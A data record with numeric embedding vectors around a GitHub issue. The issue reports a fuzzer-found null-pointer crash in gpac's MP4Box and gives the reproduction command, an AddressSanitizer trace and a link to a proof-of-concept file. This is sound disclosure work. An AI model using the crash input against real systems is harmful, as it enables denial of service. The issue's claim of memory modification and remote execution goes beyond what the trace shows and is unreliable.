-0.007140186615288258, -0.03423217684030533, 0.0016941583016887307, -0.004457163158804178, 0.018453964963555336, -0.021173343062400818, -0.01003407035022974, 0.04225943237543106, -0.023907264694571495, -0.032719794660806656, -0.0060313488356769085, -0.005853207781910896, 0.011531909927725792, -0.004464434459805489, 0.0072928788140416145, 0.010608484968543053, 0.008252659812569618, 0.0025430552195757627, 0.0034210362937301397, -0.0060059004463255405, -0.019442830234766006, 0.01484751608222723, -0.005551458802074194, -0.006354911252856255, -0.011211982928216457, 0.002144964411854744, -0.006089517381042242, -0.030712980777025223, -0.004369910340756178, 0.005751412827521563, 0.016607113182544708, -0.000994318281300366, -0.012826159596443176, -0.029636863619089127, 0.018046785145998, 0.0012633476871997118, 0.010942953638732433, 0.0021795020438730717, 0.008303556591272354, 0.005994993727654219, -0.019660960882902145, 0.005631440319120884, 0.0016378075815737247, 0.01705791987478733, 0.0062385741621255875, 0.0036500750575214624, 0.012229932472109795, -0.0020522582344710827, 0.013553266413509846, 0.009975901804864407, 0.004311741795390844, 0.03708243370056152, 0.011248338967561722, -0.01412040926516056, -0.015589164569973946, -0.03650074824690819, 0.01673799380660057, 0.011168356984853745, 0.004944324493408203, 0.008012714795768261, 0.005675066728144884, -0.028895214200019836, 0.005696880165487528, 0.006518510170280933, -0.02604495733976364, 0.007845479995012283, -0.019704587757587433, 0.029956789687275887, 0.0005439665983431041, 0.006449435371905565, 0.013764127157628536, 0.003495564917102456, -0.0006362182321026921, -0.03373774513602257, 0.00783820915967226, -0.007772769313305616, -0.016272645443677902, -0.0005757774924859405, -0.02569594606757164, -0.0012079058215022087, 0.012927955016493797, 0.011902734637260437, -0.001072482205927372, -0.00774368504062295, -0.013291507959365845, 0.017697773873806, 0.015763670206069946, 0.008427165448665619, -0.007267429959028959, 0.02562323585152626, 0.0071583641692996025, 0.0036228084936738014, 0.02056257426738739, -0.013167900033295155, 0.0036900658160448074, -0.0159236341714859, -0.002870253287255764, -0.005242438521236181, 0.007169270887970924, -0.0062131257727742195, -0.025739572942256927, -0.013589621521532536, -0.007176541723310947, -0.003926375415176153, 0.00454805139452219, -0.005035213194787502, 0.010368539951741695, -0.014229475520551205, -0.018992023542523384, -0.0007748229545541108, -0.015443743206560612, -0.002095884643495083, -0.019457371905446053, 0.008645297028124332, -0.01072482205927372, -0.013117002323269844, 0.007434664759784937, 0.0067075579427182674, 0.006009535863995552, 0.0029229684732854366, 0.007656432222574949, -0.0000032414468478236813, -0.0025321487337350845, -0.006733006797730923, -0.010862971656024456, 0.02838624082505703, -0.027688218280673027, 0.003886384656652808, 0.009176084771752357, -0.01841033808887005, -0.011844566091895103, -0.009357861243188381, -0.024939754977822304, -0.011401031166315079, -0.0022376703564077616, -0.011190170422196388, 0.0001071346050594002, -0.003842758247628808, 0.024503491818904877, -0.009881378151476383, 0.02530330792069435, 0.028197193518280983, -0.0010288557969033718, 0.012804347090423107, 0.0005603265017271042, 0.0131824417039752, -0.015589164569973946, 0.007932732813060284, -0.014025885611772537, -0.007005671970546246, 0.0032228997442871332, 0.015792755410075188, 0.016185391694307327, -0.001049760146997869, 0.030305800959467888, 0.005675066728144884, 0.0026557566598057747, -0.013953175395727158, 0.0010797532740980387, 0.014149493537843227, -0.009336048737168312, -0.015690959990024567, -0.007896377705037594, 0.005613262765109539, -0.0013433294370770454, -0.014905684627592564, 0.005805945955216885, 0.0009425118914805353, -0.030451223254203796, -0.02597224712371826, -0.032894302159547806, -0.012840702198445797, 0.01854121685028076, -0.014091324992477894, -0.006383995525538921, 0.005067932885140181, 0.010855700820684433, -0.017348762601614, 0.008587128482758999, 0.002441260265186429, -0.004940689075738192, 0.02428535930812359, -0.011386488564312458, 0.013087918050587177, 0.009125187061727047, 0.005267886910587549, -0.01759597845375538, -0.015385574661195278, -0.0031029272358864546, 0.015516454353928566, 0.0016914316220209002, -0.03557005152106285, -0.008281744085252285, 0.008201762102544308, 0.0016587118152529001, -0.008129050955176353, -0.014614841900765896, -0.019457371905446053, -0.005395130719989538, 0.011677331291139126, -0.0016050877748057246, -0.005853207781910896, 0.0022758436389267445, -0.0066821095533668995, 0.009655974805355072, 0.002379456302151084, 0.021682318300008774, 0.030625728890299797, -0.011728229001164436, 0.028371699154376984, 0.009088831953704357, 0.01263711228966713, -0.0052206250838935375, -0.02300565131008625, -0.00404271250590682, 0.0019177435897290707, -0.01681070402264595, -0.02742645889520645, 0.004529873840510845, -0.005696880165487528, 0.0026157659012824297, 0.019762756302952766, 0.004533509258180857, 0.003397405380383134, 0.02098429575562477, 0.0010742999147623777, 0.007590992376208305, 0.005049755331128836, 0.014018614776432514, -0.013204255141317844, 0.00786002166569233, -0.011481013149023056, -0.0056823380291461945, 0.008318099193274975, 0.004322648514062166, 0.0012806163867935538, -0.026379426941275597, 0.0026848409324884415, 0.009423301555216312, -0.04490610212087631, -0.00918335560709238, -0.009176084771752357, 0.01670890860259533, 0.021086091175675392, 0.0021067913621664047, -0.00246852682903409, 0.011444657109677792, 0.0023776383604854345, -0.02216220833361149, -0.026466678828001022, -0.021711401641368866, 0.00778731144964695, -0.014207662083208561, -0.008667110465466976, -0.0027739114593714476, -0.01177185494452715, -0.007685516495257616, -0.0016768894856795669, -0.0028557111509144306, -0.001826855237595737, 0.0066275764256715775, 0.0042935642413794994, 0.0007616440998390317, 0.03379591181874275, 0.03234170004725456, -0.0129206832498312, -0.0037845897022634745, 0.0034210362937301397, 0.012448064051568508, -0.012506232596933842, -0.010412165895104408, -0.013356947340071201, -0.008507146500051022, 0.02226400375366211, 0.020329900085926056, 0.016854330897331238, 0.014229475520551205, 0.007125644478946924, -0.0007393764681182802, -0.0013006118824705482, 0.006329462863504887, 0.003570093307644129, -0.011524639092385769, 0.006314920727163553, -0.0030829317402094603, -0.007180177140980959, 0.0005444210255518556, -0.003948188852518797, -0.0050933812744915485, 0.008572586812078953, 0.024823417887091637, -0.010913869366049767, 0.019980888813734055, 0.008027256466448307, -0.006329462863504887, 0.0013106096303090453, 0.008943410590291023, -0.01606905460357666, -0.009139729663729668, 0.01954462379217148, 0.011270151473581791, 0.0032247176859527826, 0.017217883840203285, -0.012164493091404438, -0.0009679606300778687, 0.005311513319611549, -0.0016505318926647305, 0.004777090158313513, -0.006154957227408886, 0.0007075655739754438, -0.011030206456780434, 0.0018513951217755675, 0.0014660286251455545, 0.0024267181288450956, 0.017116088420152664, 0.0011697326553985476, -0.013865922577679157, -0.0032992460764944553, -0.00804906990379095, 0.01843942329287529, 0.010841159150004387, 0.0046098558232188225, -0.014585757628083229, 0.010681195184588432, -0.01396044623106718, -0.018148580566048622, 0.0020740714389830828, 0.0007043844670988619, -0.026030415669083595, 0.009219711646437645, 0.0008229937520809472, -0.012615298852324486, -0.0035664576571434736, 0.0029865901451557875, 0.001547828083857894, 0.018381254747509956, -0.015763670206069946, -0.002786635886877775, 0.004642575513571501, 0.002793906955048442, -0.013226068578660488, 0.005235167220234871, 0.014716637320816517, 0.005460570100694895, 0.016621656715869904, -0.018104953691363335, 0.0035391913261264563, -0.0036609815433621407, 0.02332557924091816, -0.021435102447867393, -0.002390362787991762, 0.010463063605129719, -0.01681070402264595, -0.008303556591272354, 0.002652121242135763, 0.0024103582836687565, 0.005129736848175526, -0.013247882016003132, 0.0028811597730964422, -0.044469837099313736, -0.011052019894123077, -0.011001122184097767, 0.01759597845375538, 0.00796181708574295, -0.019864551723003387, -0.005700515583157539, 0.014396710321307182, -0.023761842399835587, 0.0023394653107970953, 0.0031574603635817766, 0.007685516495257616, -0.002473980188369751, 0.02502700872719288, -0.005009764339774847, -0.003028398845344782, -0.02665572613477707, 0.0002649394446052611, 0.022743893787264824, -0.0009525095811113715, -0.0057695903815329075, 0.01942828670144081, -0.0063476404175162315, 0.0024158116430044174, 0.004457163158804178, 0.012200848199427128, 0.0016232654452323914, 0.01067392434924841, 0.017988616600632668, -0.004159049596637487, 0.006991129834204912, -0.015167443081736565, -0.007387402933090925, -0.02041715197265148, -0.00035719110746867955, 0.015443743206560612, -0.0003921831084880978, -0.016039971262216568, 0.006932961288839579, 0.0318472683429718, 0.01656348817050457, 0.013066104613244534, 0.015196527354419231, 0.0061585926450788975, 0.01399680133908987, -0.010252202861011028, -0.02374730072915554, -0.002821173518896103, -0.0007043844670988619, 0.012957039289176464, -0.0019304679008200765, 0.004580771550536156, -0.015298321843147278, -0.014469420537352562, -0.007027484942227602, 0.008936139754951, -0.013247882016003132, 0.007387402933090925, -0.0035228312481194735, -0.0037773186340928078, 0.01727605238556862, 0.010383081622421741, -0.00272483192384243, -0.002743009477853775, -0.006525781471282244, 0.009205169044435024, 0.022976567968726158, 0.0015232881996780634, 0.020431693643331528, -0.010303099639713764, 0.010077697224915028, -0.01175004243850708, -0.003006585640832782, 0.005118830129504204, -0.008463520556688309, -0.010593942366540432, 0.009256066754460335, -0.025492357090115547, -0.015269237570464611, -0.002972048008814454, -0.0009152453858405352, 0.011597349308431149, 0.003233806462958455, 0.014483963139355183, 0.021682318300008774, -0.024445323273539543, -0.000600317376665771, 0.006231303326785564, 0.0028575288597494364, -0.013640519231557846, 0.002284932415932417, 0.0023431009612977505, -0.02073707990348339, -0.015196527354419231, 0.057179659605026245, -0.005765954963862896, 0.03135283663868904, 0.020620742812752724, -0.007034756243228912, 0.0027520982548594475, 0.0058968341909348965, -0.01272436510771513, -0.012680738233029842, 0.01942828670144081, -0.011444657109677792, -0.0034210362937301397, -0.011895463801920414, 0.004638940095901489, 0.009016121737658978, 0.005569636356085539, 0.00815813522785902, -0.016607113182544708, 0.0030593008268624544, -0.00348647590726614, -0.004304470960050821, 0.0154873700812459, 0.036151736974716187, -0.0037136967293918133, -0.0006298560765571892, 0.0222930870950222, 0.01166278962045908, -0.009474198333919048, 0.006987493950873613, -0.0038245804607868195, 0.020838873460888863, 0.005180634092539549, -0.014992937445640564, -0.018643012270331383, 0.009779583662748337, -0.0006234938628040254, -0.007511010859161615, 0.03164367750287056, -0.003346507903188467, 0.012302642688155174, -0.006413079798221588, 0.008579857647418976, -0.01589454896748066, 0.01509473193436861, -0.0057695903815329075, -0.010666653513908386, 0.007071111351251602, 0.0378677099943161, 0.020344441756606102, 0.012128137983381748, 0.033999502658843994, 0.006882063578814268, -0.000765279633924365, -0.01572004333138466, -0.000999771524220705, -0.0038173093926161528, 0.0003769593022298068, -0.01098658051341772, -0.0072128972969949245, -0.016578029841184616, -0.007481926586478949, -0.013364219106733799, -0.0033046994358301163, -0.024125395342707634, -0.01460030023008585, -0.0020922492258250713, -0.011982716619968414, 0.012753449380397797, 0.0006262205424718559, 0.025986788794398308, 0.004322648514062166, -0.014367626048624516, -0.02555052563548088, 0.00003737782026291825, 0.014309457503259182, -0.023340120911598206, 0.01967550441622734, -0.01691249944269657, 0.002317652106285095, -0.004573500249534845, -0.03004404343664646, 0.0014405798865482211, -0.006758455652743578, 0.0035519155208021402, -0.00914700049906969, -0.00888524204492569, -0.002088613575324416, -0.009583264589309692, 0.005602356046438217, 0.023776384070515633, 0.01755235344171524, -0.015123816207051277, 0.011204712092876434, 0.0005871385801583529, 0.00824538804590702, -0.003328330349177122, -0.00983775220811367, -0.01194636058062315, 0.0025557796470820904, 0.004984315484762192, 0.007583721540868282, 0.000502612441778183, -0.003324694698676467, -0.0025339664425700903, 0.00591864762827754, 0.007416487205773592, 0.0019231968326494098, -0.003324694698676467, -0.008863428607583046, 0.019195612519979477, 0.006358547136187553, -0.017392389476299286, -0.0004176318470854312, 0.0051588211208581924, 0.012818888761103153, 0.029404189437627792, 0.006369453389197588, 0.0020377160981297493, -0.009568721987307072, 0.019602792337536812, -0.002330376533791423, -0.01281161792576313, 0.013640519231557846, 0.010041342116892338, 0.01932649314403534, 0.0005403310642577708, 0.011968174017965794, 0.01809041202068329, 0.02048986218869686, -0.0069693163968622684, 0.006674838252365589, -0.016752535477280617, 0.011917276307940483, 0.006918419152498245, 0.0027339207008481026, 0.016054512932896614, -0.0040863389149308205, 0.018308542668819427, 0.014840245246887207, 0.01297158095985651, -0.012804347090423107, 0.05258434638381004, -0.027862723916769028, 0.0238927211612463, -0.01989363506436348, 0.019530082121491432, -0.002797542605549097, 0.013466013595461845, 0.002704836428165436, -0.00792546197772026, 0.00029197873664088547, 0.000213587554753758, 0.010870243422687054, -0.00249034003354609, 0.0005675975698977709, 0.006685744971036911, -0.009110645391047001, 0.015225611627101898, 0.0009107009973376989, 0.009983173571527004, 0.02155143953859806, -0.0011261062463745475, -0.0070856534875929356, 0.018250374123454094, -0.014665739610791206, 0.005184269975870848, -0.0019413745030760765, -0.018279459327459335, -0.008136322721838951, 0.0046716597862541676, -0.02754279598593712, -0.002759369323030114, 0.01493476890027523, -0.0026503035333007574, 0.013589621521532536, 0.012266287580132484, 0.025826824828982353, -0.0013669603504240513, 0.00791091937571764, 0.012222661636769772, 0.016229018568992615, -0.005133372265845537, 0.004700744058936834, -0.010310371406376362, 0.03443576768040657, -0.00407906761392951, 0.0029447816777974367, -0.01268800999969244, 0.015763670206069946, -0.00396273098886013, 0.0038536647334694862, -0.0154873700812459, 0.008790718391537666, 0.011684602126479149, -0.0020758891478180885, 0.020853416994214058, 0.0019195612985640764, 0.018890228122472763, 0.010855700820684433, 0.019093818962574005, 0.02678660675883293, -0.014694823883473873, -0.01297158095985651, 0.01841033808887005 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hello,I use the fuzzer(AFL) to fuzz binary gpac and got some crashes. The following is the details. ### Description A SEGV on unknown address 0x000000000000 has occurred in function split_isomedia_file_main gpac/applications/mp4box/fileimport.c:2364:6 when running program MP4Box, this can reproduce on the lattest commit. ### System && Software version info ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev389-g6ae306f5a-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io $uname -a Linux ppg-X10DRi 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ``` ### Steps to reproduce ``` CFLAGS="-g -O0 -lpthread -fsanitize=address" ./configure make -j ``` ### Command&&Result ``` $./MP4Box -add poc3 -new /tmp/output.mp4 -split-size 5000000 Unrecognized import option 000004,sig, ignoring Unrecognized import option 11,src, ignoring Unrecognized import option 004830,argv, ignoring Unrecognized import option 000060,time, ignoring Unrecognized import option 1651917,execs, ignoring Unrecognized import option 173547,op, ignoring Unrecognized import option argv,pos, ignoring Unrecognized import option 0, ignoring [iso file] Unknown box type st80l in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11977 size 276821 [iso file] Incomplete file while reading for dump - aborting parsing IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 201 - Video (size 0 x 0) [iso file] Unknown box type st80l in parent minf IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 65737 - media type "hint:00000000" IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 101 - Audio (SR 11025 - 1 channels) IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 65637 - media type "hint:rtp " Split by size but output not a template, using /tmp/output_$num$.mp4 as output AddressSanitizer:DEADLYSIGNAL ================================================================= ==2366747==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fbaf17fa3dc bp 0x607000007410 sp 0x7ffc8b8dbfc0 T0) ==2366747==The signal is caused by a READ memory access. ==2366747==Hint: address points to the zero page. #0 0x7fbaf17fa3dc in gf_isom_add_user_data (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x39a3dc) #1 0x7fbaf1d5ba69 in mp4_mux_set_udta (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x8fba69) #2 0x7fbaf1d55480 in mp4_mux_setup_pid (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x8f5480) #3 0x7fbaf1b6c030 in gf_filter_pid_configure (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x70c030) #4 0x7fbaf1b7aad6 in gf_filter_pid_connect_task (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x71aad6) #5 0x7fbaf1ba5a94 in gf_fs_thread_proc (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x745a94) #6 0x7fbaf1ba49a0 in gf_fs_run (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x7449a0) #7 0x525413 in split_isomedia_file /home/ppg/fuz_carpet/gpac/applications/mp4box/fileimport.c:2364:6 #8 0x4eae0b in mp4box_main /home/ppg/fuz_carpet/gpac/applications/mp4box/mp4box.c:6551:7 #9 0x7fbaf10ee564 in __libc_start_main csu/../csu/libc-start.c:332:16 #10 0x42ad1d in _start (/home/ppg/fuzz/gpac/build_carpet/bin/MP4Box+0x42ad1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/ppg/fuzz_carpet/gpac/build_carpet/lib/libgpac.so.12+0x39a3dc) in gf_isom_add_user_data ==2366747==ABORTING ``` ### Impact This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution. ### POC [poc3.zip](https://github.com/gpac/gpac/files/11889469/poc3.zip)
A SEGV in function split_isomedia_file_main at gpac/applications/mp4box/fileimport.c:2364:6
https://api.github.com/repos/gpac/gpac/issues/2508/comments
1
2023-06-28T03:30:01
2023-06-28T06:45:36Z
https://github.com/gpac/gpac/issues/2508
1,778,110,898
2,508
false
This is a GitHub Issue repo:gpac owner:gpac Title : A SEGV in function split_isomedia_file_main at gpac/applications/mp4box/fileimport.c:2364:6 Issue date: --- start body --- Hello,I use the fuzzer(AFL) to fuzz binary gpac and got some crashes. The following is the details. ### Description A SEGV on unknown address 0x000000000000 has occurred in function split_isomedia_file_main gpac/applications/mp4box/fileimport.c:2364:6 when running program MP4Box, this can reproduce on the lattest commit. ### System && Software version info ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev389-g6ae306f5a-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io $uname -a Linux ppg-X10DRi 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ``` ### Steps to reproduce ``` CFLAGS="-g -O0 -lpthread -fsanitize=address" ./configure make -j ``` ### Command&&Result ``` $./MP4Box -add poc3 -new /tmp/output.mp4 -split-size 5000000 Unrecognized import option 000004,sig, ignoring Unrecognized import option 11,src, ignoring Unrecognized import option 004830,argv, ignoring Unrecognized import option 000060,time, ignoring Unrecognized import option 1651917,execs, ignoring Unrecognized import option 173547,op, ignoring Unrecognized import option argv,pos, ignoring Unrecognized import option 0, ignoring [iso file] Unknown box type st80l in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Incomplete box mdat - start 11977 size 276821 [iso file] Incomplete file while reading for dump - aborting parsing IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 201 - Video (size 0 x 0) [iso file] Unknown box type st80l in parent minf IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 65737 - media type "hint:00000000" IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 101 - Audio (SR 11025 - 1 channels) IsoMedia import id:000004,sig:11,src:004830,argv:000060,time:1651917,execs:173547,op:argv,pos:0 - track ID 65637 - media type "hint:rtp " Split by size but output not a template, using /tmp/output_$num$.mp4 as output AddressSanitizer:DEADLYSIGNAL ================================================================= ==2366747==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fbaf17fa3dc bp 0x607000007410 sp 0x7ffc8b8dbfc0 T0) ==2366747==The signal is caused by a READ memory access. ==2366747==Hint: address points to the zero page. #0 0x7fbaf17fa3dc in gf_isom_add_user_data (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x39a3dc) #1 0x7fbaf1d5ba69 in mp4_mux_set_udta (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x8fba69) #2 0x7fbaf1d55480 in mp4_mux_setup_pid (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x8f5480) #3 0x7fbaf1b6c030 in gf_filter_pid_configure (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x70c030) #4 0x7fbaf1b7aad6 in gf_filter_pid_connect_task (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x71aad6) #5 0x7fbaf1ba5a94 in gf_fs_thread_proc (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x745a94) #6 0x7fbaf1ba49a0 in gf_fs_run (/home/ppg/fuzz/gpac/build_carpet/lib/libgpac.so.12+0x7449a0) #7 0x525413 in split_isomedia_file /home/ppg/fuz_carpet/gpac/applications/mp4box/fileimport.c:2364:6 #8 0x4eae0b in mp4box_main /home/ppg/fuz_carpet/gpac/applications/mp4box/mp4box.c:6551:7 #9 0x7fbaf10ee564 in __libc_start_main csu/../csu/libc-start.c:332:16 #10 0x42ad1d in _start (/home/ppg/fuzz/gpac/build_carpet/bin/MP4Box+0x42ad1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/ppg/fuzz_carpet/gpac/build_carpet/lib/libgpac.so.12+0x39a3dc) in gf_isom_add_user_data ==2366747==ABORTING ``` ### Impact This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution. ### POC [poc3.zip](https://github.com/gpac/gpac/files/11889469/poc3.zip) --- end body ---
4,274
[ -0.03199277073144913, 0.023419544100761414, -0.007736813742667437, 0.012075702659785748, 0.004503183998167515, 0.0065008653327822685, -0.04671960324048996, 0.03707098960876465, -0.015876898542046547, 0.03441239148378372, -0.04038676619529724, 0.020716140046715736, 0.031245974823832512, -0.016773054376244545, 0.02806461974978447, 0.00033115767291747034, 0.0027183399070054293, 0.021985694766044617, -0.019715433940291405, 0.003328846301883459, 0.03211225941777229, -0.03539816290140152, -0.024211149662733078, 0.051051024347543716, -0.013546892441809177, 0.021522680297493935, -0.014629747718572617, 0.0039020127151161432, -0.009626209735870361, 0.03330713137984276, -0.008341719396412373, 0.02739250287413597, 0.002567113609984517, 0.017400363460183144, 0.035428036004304886, -0.003931884653866291, 0.05137961357831955, 0.0753965973854065, 0.00988758821040392, 0.013068942353129387, 0.002148907631635666, -0.045524727553129196, -0.036413807421922684, 0.01267314050346613, -0.003905746852979064, 0.026959361508488655, -0.004073775839060545, -0.001187406713142991, -0.029453661292791367, 0.004592799581587315, 0.02855750545859337, -0.01271794829517603, -0.015137569047510624, -0.0601021982729435, 0.03051411360502243, -0.03091738373041153, 0.050274353474378586, 0.009805440902709961, -0.003282171441242099, 0.03489034250378609, -0.003838535165414214, -0.002544709714129567, -0.011470797471702099, 0.028363339602947235, -0.007886173203587532, 0.029214687645435333, 0.0025465767830610275, 0.010873359628021717, -0.013823207467794418, 0.04196997359395027, -0.011560413055121899, -0.048272937536239624, 0.012456568889319897, 0.013263109140098095, 0.007199120242148638, -0.016041193157434464, 0.048004090785980225, 0.00844627059996128, -0.03527867794036865, 0.021657103672623634, -0.0721704363822937, 0.031036870554089546, -0.03169405087828636, 0.03264995291829109, 0.012217594310641289, 0.0031944229267537594, -0.01847575046122074, -0.08399969339370728, -0.011709772050380707, -0.021716848015785217, 0.00900636799633503, 0.017684146761894226, 0.006056521087884903, 0.010492493398487568, 0.018625110387802124, 0.009066112339496613, -0.015637923032045364, -0.007277533877640963, -0.044927291572093964, -0.016175616532564163, -0.038086630403995514, -0.021014859899878502, -0.0031962899956852198, -0.00018074814579449594, -0.003980426583439112, 0.019356971606612206, 0.00889434851706028, -0.029364045709371567, 0.03327726200222969, 0.1383664906024933, 0.013068942353129387, 0.023524096235632896, 0.00905117578804493, -0.0021433066576719284, 0.010462622158229351, 0.011060059070587158, -0.0041036480106413364, -0.023120826110243797, -0.05048345774412155, -0.03961009904742241, 0.017714018002152443, -0.020447293296456337, -0.014114458113908768, 0.007886173203587532, -0.034740984439849854, 0.05120038241147995, -0.013778399676084518, 0.009536594152450562, -0.027183400467038155, -0.0029946547001600266, -0.0440012626349926, -0.019864792004227638, 0.0108434883877635, -0.02371826395392418, 0.016011321917176247, -0.012105574831366539, -0.02752692624926567, 0.033157773315906525, 0.003668638877570629, 0.018714725971221924, -0.05995284020900726, -0.023210441693663597, 0.01049996167421341, 0.004204465541988611, -0.0015290662413462996, -0.013054006733000278, 0.000122521334560588, 0.002989053726196289, -0.016668502241373062, -0.014935933984816074, -0.0009176264284178615, -0.013965098187327385, 0.014443048276007175, 0.015264525078237057, 0.05995284020900726, 0.012352017685770988, 0.025450831279158592, 0.03978933021426201, 0.01796792820096016, -0.03220187500119209, 0.00902877189218998, -0.02344941720366478, 0.022209733724594116, -0.01838613487780094, -0.015533371828496456, -0.013517020270228386, 0.027810709550976753, 0.018132224678993225, 0.01041034609079361, 0.030439434573054314, -0.002085429849103093, -0.014129393734037876, 0.030394626781344414, 0.03291879966855049, -0.0596541203558445, -0.0045069181360304356, 0.012299741618335247, 0.04609229415655136, -0.020940179005265236, 0.0060751913115382195, -0.00823716726154089, 0.00979797262698412, 0.002167577389627695, 0.012075702659785748, 0.003987894393503666, -0.015503499656915665, 0.020521974191069603, -0.03829573467373848, 0.020611589774489403, -0.029274430125951767, 0.016100937500596046, -0.006202146876603365, 0.0030394624918699265, -0.003732116660103202, 0.04522600769996643, 0.010948039591312408, -0.017938056960701942, -0.018893957138061523, 0.0034464667551219463, -0.0016009454848244786, -0.0044546425342559814, -0.01036553829908371, -0.01810235157608986, 0.01814715936779976, -0.03725022077560425, -0.0064149838872253895, -0.014808978885412216, 0.01973036862909794, 0.006358974147588015, -0.025674870237708092, -0.016399655491113663, -0.045972805470228195, 0.005989309400320053, -0.004798168782144785, -0.018266648054122925, 0.002985319821164012, -0.01919267512857914, 0.014920998364686966, -0.014973274432122707, -0.0072028543800115585, 0.023748135194182396, 0.027332760393619537, 0.0057876743376255035, -0.02539108879864216, -0.05087179318070412, -0.04179074242711067, 0.0008471475448459387, 0.012613396160304546, -0.021851271390914917, 0.019073188304901123, 0.019431650638580322, -0.011403585784137249, -0.013584231957793236, 0.028691928833723068, 0.01161268912255764, -0.009334959089756012, -0.00215637544170022, -0.006702500395476818, 0.002759413793683052, 0.01751985028386116, -0.011284098029136658, 0.019894665107131004, -0.023778006434440613, -0.011052591726183891, 0.021925952285528183, 0.053171925246715546, -0.022030502557754517, 0.000008474392416246701, -0.009648613631725311, 0.014599875546991825, -0.0108882961794734, 0.0017633737297728658, -0.005746600683778524, -0.008550822734832764, 0.0025204389821738005, -0.007796557620167732, 0.014233944937586784, -0.011187015101313591, -0.013270577415823936, -0.012105574831366539, 0.01774388924241066, -0.017639338970184326, -0.01910305954515934, -0.006142402999103069, 0.02376307174563408, -0.027153529226779938, -0.031484950333833694, 0.027407439425587654, -0.007046027109026909, -0.025659935548901558, 0.021791527047753334, -0.010671724565327168, -0.03662291169166565, -0.044837675988674164, -0.014226477593183517, 0.008401462808251381, 0.015384011901915073, 0.029677702113986015, 0.01100031565874815, 0.0011136606335639954, -0.003621964016929269, 0.00834918674081564, -0.016773054376244545, 0.03100699931383133, 0.010036948136985302, -0.01874459721148014, 0.022075310349464417, -0.01073146890848875, -0.013300449587404728, -0.008005660958588123, 0.025734614580869675, 0.010694128461182117, -0.04146215319633484, 0.022388964891433716, 0.03285905346274376, 0.03154469281435013, 0.006541938986629248, 0.038265861570835114, -0.029095198959112167, 0.011373713612556458, -0.01987972855567932, -0.01977517642080784, 0.0017895116470754147, 0.008043000474572182, -0.050543200224637985, 0.013980034738779068, -0.024883266538381577, 0.012874775566160679, -0.029364045709371567, -0.002072360832244158, 0.03733983635902405, -0.046062421053647995, -0.035876113921403885, 0.004973666276782751, -0.017818570137023926, -0.008879412896931171, 0.004032702185213566, -0.014189137145876884, -0.035338420420885086, 0.006246954668313265, -0.0040700421668589115, 0.0007822695770300925, -0.041223179548978806, 0.012127978727221489, 0.037280090153217316, -0.01983492076396942, -0.017952993512153625, 0.028273724019527435, -0.05753321945667267, 0.029140006750822067, 0.015772346407175064, -0.013793335296213627, 0.003325112396851182, -0.03969971463084221, -0.004028968047350645, -0.02376307174563408, -0.03091738373041153, 0.014935933984816074, 0.028034748509526253, 0.01132143847644329, 0.003547284286469221, 0.014331028796732426, 0.013502084650099277, -0.004749626852571964, -0.01950632967054844, -0.005246246699243784, 0.008685246109962463, 0.008453738875687122, 0.012366953305900097, 0.0036966437473893166, 0.0010287124896422029, 0.03584624081850052, 0.02046222984790802, 0.043433696031570435, -0.0012387490132823586, -0.043523311614990234, 0.005492690019309521, -0.012464037165045738, 0.023613711819052696, -0.0001359403395326808, 0.034024059772491455, -0.010402877815067768, -0.010380473919212818, 0.03256033733487129, -0.01023111492395401, 0.0218214001506567, 0.01145586185157299, -0.011799387633800507, -0.015787282958626747, -0.011082462966442108, -0.01937190629541874, 0.07007940113544464, -0.027945132926106453, 0.006288028322160244, 0.003373654093593359, -0.0037993283476680517, 0.021806463599205017, -0.00208729668520391, -0.03363572433590889, 0.011672432534396648, -0.050543200224637985, 0.013479680754244328, 0.026944424957036972, -0.059056684374809265, 0.026242436841130257, 0.014301156625151634, -0.025226792320609093, 0.05711501091718674, -0.021881144493818283, -0.0009516990394331515, -0.03662291169166565, 0.05825014412403107, -0.03527867794036865, -0.0599229671061039, -0.020118704065680504, -0.015637923032045364, 